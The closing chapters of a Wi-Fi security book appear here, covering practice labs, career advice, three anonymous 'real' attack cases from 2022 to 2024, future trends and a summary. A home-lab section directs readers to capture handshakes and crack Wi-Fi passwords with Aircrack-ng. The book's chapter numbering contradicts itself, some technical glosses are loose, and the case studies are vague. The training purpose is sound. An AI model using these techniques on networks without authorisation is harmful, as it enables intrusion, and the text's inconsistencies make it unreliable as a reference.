○ Client Devices: Laptops, smartphones and IoT devices to test security.
● Software Tools:
○ Kali Linux: Linux-based operating system with a wide range of pre-installed
security tools.
○ Aircrack-ng: Set of tools for Wi-Fi auditing and penetration testing.
○ Wireshark: Packet analysis tool to monitor and analyze network traffic.
○ Metasploit: Penetration testing platform that allows you to explore
vulnerabilities.
● Network Configuration:
○ Network Segmentation: Create VLANs to isolate devices and simulate different
network scenarios.
○ Security Configuration: Implement different security configurations, such as
WPA3, to test the effectiveness of defenses.

Online Practice Platforms


Several online platforms offer practice environments where professionals can test their Wi-Fi
security skills.
● Hack The Box:
○ Description: Platform that offers hacking labs and cybersecurity challenges.
○ Resources: Hands-on labs, Wi-Fi challenges, certifications.
● TryHackMe:
○ Description: Interactive learning platform that offers practical labs and network
security challenges.
○ Resources: Learning modules, hands-on labs, learning trails.
● VulnHub:
○ Description: Repository of vulnerable machines for download and practice
penetration testing.
○ Resources: Vulnerable virtual machines, challenges documentation, support
community.

Continuous Learning Resources


Wi-Fi security is a constantly evolving field, and it's crucial to stay up to date with the latest
trends, techniques, and vulnerabilities.

Books and Publications


Reading books and specialized publications helps to deepen your knowledge and keep up with
innovations in the area.
● Magazines and newspapers:
○ "IEEE Wireless Communications": Publication focused on research and
innovations in wireless networks.
○ "SecurityWeek": Cybersecurity news and analysis and network security trends.

Blogs and Forums


Following blogs and participating in discussion forums allows you to share knowledge and learn
from the community.
● Recommended Blogs:
○ Krebs on Security: Blog by Brian Krebs focused on information security and
cybersecurity.
○ Schneier on Security: Bruce Schneier's blog with analysis and opinions on
information security.
● Recommended Forums:
○ Reddit: Subreddits like r/netsec and r/hacking offer discussions about network
security and ethical hacking.
○ Stack Exchange: Cybersecurity Q&A community on Security Stack Exchange.

Building a Career in Wi-Fi Security


Building a career in Wi-Fi security requires careful planning, ongoing skill development, and
networking with professionals in the field.

Career Planning
Setting clear career goals and creating an action plan helps direct professional development
efforts.
● Defining Objectives:
○ Short term: Obtain relevant certifications, acquire practical skills, participate in
training.
○ Mid-term: Gain experience in Wi-Fi security projects, contribute to the
community, seek leadership positions.
○ Long term: Become a recognized expert in the field, publish research, give talks
at conferences.
● Action plan:
○ Education: Search for relevant courses and certifications.
○ Practice: Create practice labs and participate in online platforms.
○ Networking: Participate in events and conferences, connect with professionals in
the field.

Practice experience
Gaining hands-on experience is crucial to developing applicable Wi-Fi security skills.
● Security Projects:
○ Participate in internal security projects in your organization.
○ Contribute to open source security projects.
● Consulting and Freelance:
○ Offer consulting services to companies needing Wi-Fi security assessments.
○ Work as a freelancer on penetration testing and security audit projects.

Networking and Community


Connecting with other professionals and participating in the cybersecurity community provides
opportunities for learning and professional growth.
● Conferences and Events:
○ Attend conferences such as DEF CON, Black Hat, and RSA Conference.
○ Get involved in local meetups and cybersecurity interest groups.
● Professional Associations:
○ Join associations like (ISC)², ISACA, and SANS Institute.
○ Participate in local chapters and events organized by these associations.

Practical Examples of Execution and Defense


Participation in Online Practice Platforms
1. Hack The Box:

○ Sign up to the platform and choose a hacking lab related to Wi-Fi security.
○ Follow the challenges and document your findings.

2. TryHackMe:

○ Sign up and choose a learning path focused on wireless security.


○ Complete learning modules and practical challenges.

Creating Home Labs


1. Lab Setup with Kali Linux:

○ Install Kali Linux on a virtual or physical machine.


○ Configure Wi-Fi adapters that support monitor mode.

2. Conducting Penetration Tests:

○ Use Aircrack-ng to capture handshakes and attempt to crack Wi-Fi passwords.


○ Use Wireshark to analyze network traffic and identify vulnerabilities.

Developing Wi-Fi security skills is an ongoing process that requires education, practice, and
networking. Certifications and training provide a solid foundation of knowledge, while labs and
practice environments allow for the development of applicable skills. Continuous learning
features help you stay up to date with the latest trends and techniques. Building a career in Wi-Fi
security involves planning, gaining hands-on experience, and connecting with the professional
community. Following these guidelines helps you become a Wi-Fi security expert, capable of
protecting wireless networks against increasingly sophisticated threats.
CHAPTER 19: REAL CASE STUDIES
2022 2023 2024

Notorious Attack Analysis


Studying real-life cases of high-profile attacks on Wi-Fi networks in recent years offers valuable
insights into the techniques used by attackers and the vulnerabilities exploited. Below, we
discuss some of the most significant attacks between 2022 and 2024, highlighting the methods
employed and the resulting impacts.

Case 1: Attack on the Financial Sector in


2022
Context: In 2022, a large bank was the target of a cyberattack that compromised its Wi-Fi
network, resulting in unauthorized access to sensitive customer data.
Attack Method:
● Wi-Fi Vulnerability Exploitation: Attackers exploited a known vulnerability in a
specific router model used by the bank, allowing them to gain access to the internal
network.
● Social Engineering Attacks: Attackers also used phishing techniques to obtain employee
credentials, facilitating access to restricted areas of the network.
Impact:
● Compromise of financial and personal data of thousands of customers.
● Significant financial losses and damage to the bank's reputation.
Lessons Learned:
● Importance of keeping the firmware of all network devices up to date.
● Need for ongoing safety training for employees.
● Implementation of two-factor authentication (2FA) for all network access accounts.

Case 2: Critical Infrastructure Intrusion in


2023
Context: In 2023, a power plant was the target of an attack that compromised its industrial
control systems via Wi-Fi, resulting in interruptions in power distribution.
Attack Method:
● Evil Twin Attack: The attackers set up a fake access point that mimicked the plant's
legitimate network. Multiple devices connected to the fake access point, allowing
sensitive data to be captured.
● Sniffing e Spoofing de Pacotes: Used tools like Wireshark and Scapy to intercept and
manipulate network traffic.
Impact:
● Interruption in power distribution to thousands of homes and businesses.
● Potential risk to public safety and critical plant systems.
Lessons Learned:
● Need for strict network segmentation to isolate critical systems.
● Implementation of intrusion detection systems (IDS) to monitor suspicious activity.
● Using VPNs to protect sensitive data communications.

Case 3: Compromise of Home Networks in


2024
Context: In 2024, a group of attackers carried out a series of coordinated attacks against home
Wi-Fi networks, aiming to steal personal and financial data.
Attack Method:
● Phishing and Social Engineering: They sent fake emails that appeared to be from
internet service providers, asking users to update their Wi-Fi settings.
● Weak Password Exploitation: They used brute force techniques to discover weak
passwords and patterns.
Impact:
● Compromise of personal and financial information of thousands of users.
● Unauthorized access to IoT devices connected to home networks.
Lessons Learned:
● Importance of using strong and unique passwords for Wi-Fi networks.
● Need for ongoing user education about phishing risks.
● Implementing additional security measures such as two-factor authentication (2FA).

Lessons Learned
Analysis of these cases highlights several important lessons for improving the security of Wi-Fi
networks. Lessons learned not only inform stronger security practices, but also help anticipate
and mitigate potential future threats.
Continuous Device Update
Keeping all network devices updated with the latest security patches is crucial to protect against
known vulnerabilities.
● Update Procedure:
○ Regularly check the manufacturer's website for firmware updates.
○ Configure devices to automatically check for updates if available.

Training and Awareness


Continuously training employees and end users on safe practices and the latest threats helps
reduce the risk of social engineering attacks.
● Training Programs:
○ Develop training modules that teach how to recognize and respond to phishing
attempts.
○ Conduct phishing simulations to test users' readiness.

Implementation of Additional Security


Measures
Additional security measures such as two-factor authentication and network segmentation
strengthen defense against attacks.
● Two-Factor Authentication (2FA):
○ Implement 2FA for all network access accounts.
○ Use authentication apps or hardware tokens.
● Network Segmentation:
○ Create VLANs to isolate critical devices and systems.
○ Configure guest networks for IoT devices that don't need to communicate with the
main network.

Practical Application of Knowledge


Applying the knowledge gained from analyzing real cases is essential to developing effective
defenses against attacks on Wi-Fi networks. Below, we discuss practical strategies that can be
implemented.

Secure Wi-Fi Router Configuration


Configuring Wi-Fi routers securely is the first line of defense against many types of attacks.
● Using WPA3:
○ Configure the router to use WPA3, which offers improved security compared to
WPA2.
○ Ensure all devices support WPA3.
● WPS deactivation:
○ Disable Wi-Fi Protected Setup (WPS), which is vulnerable to brute force attacks.
○ Access the router's administration interface and disable WPS in the security
settings.
● Changing Default Passwords:
○ Change the router's default passwords to strong, unique passwords.
○ Use a combination of upper and lower case letters, numbers and special
characters.

Continuous Monitoring and Intrusion


Detection
Implementing continuous monitoring and intrusion detection systems helps you quickly identify
and respond to suspicious activity.
● Intrusion Detection Systems (IDS):
○ Configure tools like Snort or Zeek to monitor network traffic and alert you to
suspicious activity.
○ Configure specific rules to detect common attacks and malicious activity.
● Packet Analysis:
○ Use Wireshark to capture and analyze network packets.
○ Configure filters to focus on specific types of traffic and identify anomalies.

Continuing Education and Security Policies


Continuously educating users and implementing strict security policies are essential components
of a robust defense.
● Continuing Education:
○ Develop and implement regular training programs for all employees and end
users.
○ Conduct workshops and seminars to update knowledge on the latest security
threats and practices.
● Security Policies:
○ Implement role-based access control policies, limiting access to sensitive
information to authorized employees only.
○ Establish procedures to verify the identity of anyone requesting confidential
information.

Thoughts on the Future of Wi-Fi Security


The future of Wi-Fi security will be shaped by a combination of technological advances and
evolving cyber threats. Below, we discuss some important trends and considerations for the
future.

Advances in Cryptography
Advances in encryption will continue to play a crucial role in securing Wi-Fi networks.
● WPA3 and Beyond:
○ WPA3 already offers significant improvements over WPA2, but future encryption
standards will continue to evolve to provide even more robust security.
○ Technologies such as post-quantum cryptography may be needed to protect
against attacks from quantum computers.

Integration with Artificial Intelligence


The integration of artificial intelligence (AI) and machine learning (ML) in network security will
enable faster detection and response to threats.
● Predictive Analytics:
○ AI algorithms can analyze network traffic patterns to predict and identify
suspicious activity before it causes harm.
○ ML tools can be trained to identify new types of attacks based on historical data.

Increasing IoT Connectivity


As the number of IoT devices continues to grow, the security of these connections will become
even more critical.
● IoT Security:
○ Implementing rigorous security standards for IoT devices will be essential to
securing Wi-Fi networks.
○ Development of specific security solutions for IoT, including network
segmentation and encryption.

Need for Compliance and Regulation


Compliance with cybersecurity regulations will continue to be a priority for companies across all
industries.
● Safety Regulations:
○ Regulations such as GDPR, HIPAA and PCI-DSS will establish minimum
security standards that companies must follow.
○ Regular audits and compliance assessments will help ensure security practices are
up to date.

Practical Examples of Execution and Defense


Secure Wi-Fi Router Configuration
1. WPA3 Configuration:

○ Access the router's administration interface.


○ Navigate to your wireless network security settings.
○ Select WPA3 as the authentication method.
○ Set up a strong password for your Wi-Fi network.
○ Save the settings and restart the router if necessary.

2. WPS deactivation:

○ Access the router's administration interface.


○ Navigate to WPS settings.
○ Disable the WPS function.
○ Save the settings.

Implementation of Intrusion Detection


Systems (IDS)
Snort Installation and Configuration:
bash
sudo apt install snort

Rules Configuration:
○ Configure specific rules to detect common attacks and malicious activity.
○ Save and apply the settings.
Traffic Monitoring:
○ Configure Snort to monitor network traffic and generate alerts about suspicious
activity.

The study of real cases of attacks on Wi-Fi networks between 2022 and 2024 offers valuable
insights into the techniques employed by attackers and the vulnerabilities exploited. Lessons
learned highlight the importance of keeping devices up to date, continually training users, and
implementing additional security measures. Applying this knowledge in practice helps you
develop effective defenses against future threats. As technology and cyber threats evolve, Wi-Fi
security must also advance, incorporating new encryption standards, artificial intelligence, and
rigorous compliance measures.
These practices ensure the integrity and security of wireless communications in an increasingly
connected world.
CHAPTER 20: FUTURE TRENDS IN WI-
FI SECURITY

Evolution of Wi-Fi Threats


Wi-Fi security threats are constantly evolving, driven by the growing reliance on wireless
networks and the increasing sophistication of attackers. Understanding these emerging trends is
crucial to developing effective defenses and anticipating future vulnerabilities.

Increase in Connected Devices


With the proliferation of IoT devices, the attack surface of Wi-Fi networks is rapidly expanding.
Each additional device represents a potential vulnerability that can be exploited by attackers.
● IoT devices: The growing number of IoT devices, many of which have weak or non-
existent security, expands the opportunities for attacks.
● Home and Business Networks: Home and business networks are becoming increasingly
interconnected, increasing the risk of attacks that can propagate quickly.

Targeted and Sophisticated Attacks


Attacks are becoming more targeted and sophisticated, with attackers using advanced techniques
to compromise Wi-Fi networks.
● Social Engineering Attacks: Phishing and other social engineering attacks are becoming
more refined, tricking users into divulging credentials or installing malware.
● Exploits Zero-Day: Unknown (zero-day) vulnerabilities are exploited by attackers before
patches or fixes are available.

Integration of Multivector Attacks


Attackers are combining multiple attack vectors to increase the effectiveness of their campaigns.
● Combined Attacks: Combination of social engineering attacks with technical exploits,
such as phishing followed by exploitation of software vulnerabilities.
● Chain Attacks: Use of chain attacks where the failure of one device leads to the
compromise of other devices on the network.

Emerging Technologies
Emerging technologies are reshaping the Wi-Fi security landscape, offering new opportunities
for protection but also new challenges.

WPA3 and Advanced Encryption


WPA3 is the new security standard for Wi-Fi networks, offering significant improvements over
WPA2.
● Features of WPA3:
○ Simultaneous Authentication of Equals (SAE): Replaces PSK, providing more
secure authentication and resistant to brute force attacks.
○ Individualized Encryption: Each connection between a device and the access
point is individually encrypted, increasing privacy and security.
○ Protection Against Dictionary Attacks: WPA3 makes dictionary attacks
difficult, where attackers try every possible combination to crack the password.

Mesh Networks
Mesh networks are gaining popularity for their ability to provide comprehensive and resilient
Wi-Fi coverage, especially over large areas.
● Characteristics of Mesh Networks:
○ Expanded Coverage: Multiple network nodes work together to provide area-
wide Wi-Fi coverage.
○ Self-Correction and Redundancy: If one node fails, the other nodes
automatically reconfigure the network to maintain connectivity.
○ Integrated Security: Many Mesh networks come with built-in security features
such as strong encryption and intrusion detection.

5G and Network Convergence


The arrival of 5G is driving the convergence of Wi-Fi and cellular networks, offering new
opportunities and challenges for security.
● Features of 5G:
○ High Speed and Low Latency: 5G offers significantly higher speeds and much
lower latency than previous networks.
○ Massive Device Connections: Supports a much larger number of devices
connected simultaneously.
○ Security Challenges: The convergence of 5G and Wi-Fi requires new approaches
to ensure security in a hybrid network environment.

Impact of AI and ML on Wi-Fi Security


Artificial intelligence (AI) and machine learning (ML) are transforming Wi-Fi security, enabling
proactive threat detection and response automation.
Proactive Threat Detection
AI and ML systems can analyze large volumes of network traffic data to identify anomalous
patterns that could indicate a threat.
● Behavioral Analysis:
○ Anomaly Detection: ML algorithms can detect anomalous behavior in the
network that could indicate an attack.
○ Pattern Identification: AI can identify patterns of malicious behavior, enabling
early detection of attacks.
● Response Automation:
○ Quick answer: AI systems can automate incident responses, such as isolating
compromised devices or blocking suspicious traffic.
○ Threat Mitigation: AI can automatically implement mitigation measures to
neutralize threats before they cause significant damage.

Continuous Learning
AI and ML systems continually improve with exposure to new data and attacks, becoming more
effective over time.
● Continuous Learning:
○ Adapting to New Threats: ML algorithms can learn from new types of attacks
and adapt their detection and response strategies.
○ Automatic Updates: AI systems can automatically update their knowledge bases
and detection rules based on new data.

Preparing for the Future


Preparing for the future of Wi-Fi security involves adopting practices and technologies that
increase network resilience and responsiveness to emerging threats.

Adopt Advanced Security Standards


Adopting the latest security standards, like WPA3, is critical to protecting Wi-Fi networks
against advanced threats.
● WPA3 implementation:
○ Equipment Update: Ensure all routers and access points support WPA3.
○ Security Configuration: Configure WPA3 on all Wi-Fi devices and networks to
take advantage of its security improvements.

Invest in AI and ML Technologies


Investing in AI and ML technologies for network security can provide a significant advantage in
detecting and mitigating threats.
● AI-Based Security Solutions:
○ Threat Detection Tools: Implement tools that use AI to monitor and analyze
network traffic.
○ Automated Response Platforms: Use platforms that automate incident responses
based on AI analytics.

Focus on Education and Training


Continuous education and security training are essential to prepare professionals and users to
face new threats.
● Training Programs:
○ Wi-Fi Security Training: Offer specialized Wi-Fi security training programs for
IT professionals.
○ User Awareness: Implement awareness programs to educate users about safe
practices and how to recognize threats.

Implement Multilayer Security Strategies


Adopting a layered security approach can significantly increase network resilience against
attacks.
● Security Strategies:
○ Network Segmentation: Isolate critical devices and networks using VLANs and
other segmentation techniques.
○ Strong Authentication: Implement two-factor authentication (2FA) and other
strong authentication methods for all devices and users.
○ Continuous Monitoring: Use continuous monitoring tools to detect and respond
to threats in real time.

Practical Examples of Execution and Defense


WPA3 implementation
1. WPA3 Configuration:

○ Access the router's administration interface.


○ Navigate to your wireless network security settings.
○ Select WPA3 as the authentication method.
○ Set up a strong password for your Wi-Fi network.
○ Save the settings and restart the router if necessary.

2. Compatibility Check:
○ Verify that all devices on the network support WPA3.
○ Update devices that don't support WPA3 or replace them with compatible models.

Using AI for Threat Detection


1. Implementing AI Solutions:

○ Select a security platform that uses AI for threat detection, such as Darktrace or
Cisco Umbrella.
○ Configure the platform to monitor network traffic and analyze behavior patterns.

2. Configuring Automated Responses:

○ Define automated incident response rules, such as isolating compromised devices


or blocking suspicious traffic.
○ Test automated responses to ensure they work as expected.

Ongoing Wi-Fi Security Training


1. Development of Training Programs:

○ Create training modules that cover the latest Wi-Fi security standards, attack and
defense techniques, and best practices.
○ Provide regular training to all IT employees and end users.

2. Attack Simulations:

○ Conduct attack simulations to test employee readiness and the effectiveness of


defenses.
○ Use simulation results to adjust and improve training programs.

The future of Wi-Fi security will be shaped by evolving threats, the advancement of emerging
technologies, and the integration of artificial intelligence and machine learning. Preparing for
these changes involves adopting advanced security standards, investing in AI and ML
technologies, continuing education, and implementing multi-layered security strategies. With
these practices, Wi-Fi networks can be protected against increasingly sophisticated threats,
ensuring the integrity and security of wireless communications in an increasingly interconnected
world.
GENERAL CONCLUSION

Summary of Key Learnings


Throughout this book, we explore in detail the different aspects of Wi-Fi security, ranging from
the basics to advanced attack and defense techniques. Let's review the key learnings from each
chapter and how this knowledge can be practically applied to protect Wi-Fi networks against
threats.
Chapter 1: Wi-Fi Networking Fundamentals
We start with an introduction to Wi-Fi networks, covering components and architecture, Wi-Fi
standards and protocols, and basic security measures. We learned about the importance of
correctly configuring Wi-Fi networks and implementing basic security measures, such as using
WPA3 and strong passwords.
Chapter 2: Configuring the Kali Linux
Environment
We explore installing and configuring Kali Linux, a popular Linux distribution for penetration
testing. We also discuss essential tools for Wi-Fi testing and how to keep your system up to date
and secure.
Chapter 3: Wi-Fi Network Analysis
We learned how to use network analysis tools to capture and interpret data packets, identify
patterns and vulnerabilities, and generate analysis reports. The ability to effectively analyze Wi-
Fi networks is crucial to identifying and mitigating potential threats.
Chapter 4: Deauthentication Attacks
We discuss the basics of deauthentication attacks, the tools and methods for executing them, and
how to mitigate and defend against these attacks. We understand the importance of protecting
networks against unauthorized deauthentication.
Chapter 5: Wi-Fi Password Cracking
We explore Wi-Fi password attack methods, including brute force and dictionary attacks, and the
tools used to do so. We learn techniques to protect networks against these attacks, such as using
complex passwords and advanced encryption.

Capítulo 6: Ataques Man-in-the-Middle


We study Man-in-the-Middle (MITM) attacks, how to execute them on Wi-Fi networks, the tools
used, and prevention and detection measures. Understanding these attacks is essential to
protecting network communications from malicious interception.
Chapter 7: WPS Vulnerability Exploitation
We discuss WPS vulnerabilities, exploitation methods, and specific tools for this. We learned
how to strengthen WPS security and the importance of disabling this functionality on Wi-Fi
networks.
Chapter 8: Evil Twin Attacks
We explore the Evil Twin concept, how to set up malicious access points, the techniques and
tools involved, and countermeasures. We learned how to identify and mitigate Evil Twin attacks
to protect network users.
Chapter 9: Packet Sniffing and Spoofing
We discuss packet sniffing and spoofing techniques, the tools used and practical cases, as well as
defense techniques. Understanding these techniques is crucial to protecting the integrity and
confidentiality of data transmitted over the network.
Chapter 10: Packet Injection
We explore packet injection, the methods and tools for performing it, and practical examples, as
well as injection attack mitigation measures. We learned the importance of protecting the
network against malicious packet injection.
Chapter 11: Enterprise Wi-Fi Network
Security
We discuss the specific challenges of corporate networks, essential security measures,
monitoring and defense tools, and study real cases. We learn how to protect corporate networks
against internal and external threats.
Chapter 12: Creating Secure Wi-Fi Networks
We explore best practices for home and office networks, essential security settings, security
scanning tools, and ongoing maintenance. We understand the importance of setting up Wi-Fi
networks securely from the start.
Chapter 13: Wi-Fi Auditing and Penetration
Testing
We discuss planning Wi-Fi audits, performing penetration tests, documentation and reporting,
and corrective actions. We learned the importance of performing regular audits to identify and
fix vulnerabilities.
Chapter 14: Automation in Wi-Fi Testing
We explore the use of scripting and automation in Wi-Fi testing, developing custom scripts,
practical examples, and the benefits and challenges of automation. We learn to automate
repetitive tasks to increase testing efficiency and accuracy.
Chapter 15: Social Engineering Techniques
in Wi-Fi Attacks
We discuss social engineering, the methods and tools used, real cases and defenses against these
attacks. We've learned the importance of educating users and implementing strict security
policies.
Chapter 16: IoT and Wi-Fi Security
We explore security challenges in IoT devices, common vulnerabilities, testing tools, and
measures to secure these devices. We've learned how to secure the growing number of IoT
devices connected to Wi-Fi networks.
Chapter 17: Wi-Fi Security Skills
Development
We discuss recommended certifications and training, labs and practice environments, ongoing
learning resources, and building a career in Wi-Fi security. We learn the importance of
continually developing professional skills in the field of Wi-Fi security.
Chapter 18: Real Case Studies 2022-2024
We analyze real cases of attacks on Wi-Fi networks, the lessons learned and the practical
application of the knowledge acquired. We learned the importance of studying real cases to
better understand attack techniques and defense measures.
Chapter 19: Future Trends in Wi-Fi Security
We discuss evolving Wi-Fi threats, emerging technologies, the impact of AI and ML on Wi-Fi
security, and how to prepare for the future. We learned the importance of adopting new
technologies and security practices to face future threats.

Application of Acquired Knowledge


The knowledge gained throughout this book can be applied in many ways to protect Wi-Fi
networks against threats. Below, we discuss some practical applications of this knowledge.

Implementation of Security Measures


Implementing robust security measures is essential to protecting Wi-Fi networks from attacks.
This includes correctly configuring routers, using advanced encryption, changing default
passwords, and disabling vulnerable features such as WPS.

Conducting Regular Audits


Performing regular audits helps identify and fix vulnerabilities before they can be exploited by
attackers. Audits should include penetration testing, network traffic analysis, and review of
security policies.

Security Task Automation


Automating repetitive security tasks, such as analyzing packets and performing penetration tests,
increases testing efficiency and accuracy. This allows security professionals to focus on
analyzing results and implementing corrective measures.

User Education and Awareness


Educating users about security risks and best practices is crucial to reducing the risk of social
engineering attacks. Regular training programs and phishing simulations help improve users'
readiness to recognize and respond to threats.

Continuous Monitoring
Implementing continuous monitoring systems, such as IDS and traffic analysis tools, helps you
quickly detect and respond to suspicious activity. Continuous monitoring is essential to maintain
real-time network security.
Future of Wi-Fi Security
The future of Wi-Fi security will be shaped by evolving threats, the advancement of emerging
technologies, and the integration of artificial intelligence and machine learning. Preparing for
these changes involves adopting advanced security standards, investing in AI and ML
technologies, continuing education, and implementing multi-layered security strategies.

Technological advancements
Advances in encryption such as WPA3 and the adoption of Mesh and 5G networks will continue
to improve the security and efficiency of Wi-Fi networks. However, these advances will also
introduce new challenges that will require innovative solutions.

AI and ML Integration
The integration of AI and ML in network security will enable proactive threat detection and
response automation, increasing the effectiveness of defenses. AI and ML systems will
continually improve with exposure to new data and attacks, becoming more effective over time.

Continuing Education and Training


Continuous education and security training are essential to prepare professionals and users to
face new threats. Specialized Wi-Fi security training programs, along with user awareness, will
help keep networks secure.

Multilayer Security Strategies


Adopting a layered security approach will significantly increase the resilience of networks
against attacks. This includes network segmentation, strong authentication, and continuous
monitoring, among other security practices.

Acknowledgment
I would like to express my sincere gratitude to
you, dear reader, for following this book to the
end. Your dedication to learning about Wi-Fi
security demonstrates a commitment to
protecting your networks and information.
I hope this book has provided valuable and practical insights that you can apply in your
professional and personal life. Wi-Fi security is a dynamic and constantly evolving field, and it is
through continuous learning and practical application of knowledge that we can ensure a safer
future for everyone.
Thank you so much for embarking on this journey with me.
I wish you success in all your cybersecurity initiatives.
Yours sincerely,
Diego Rodrigues

You might also like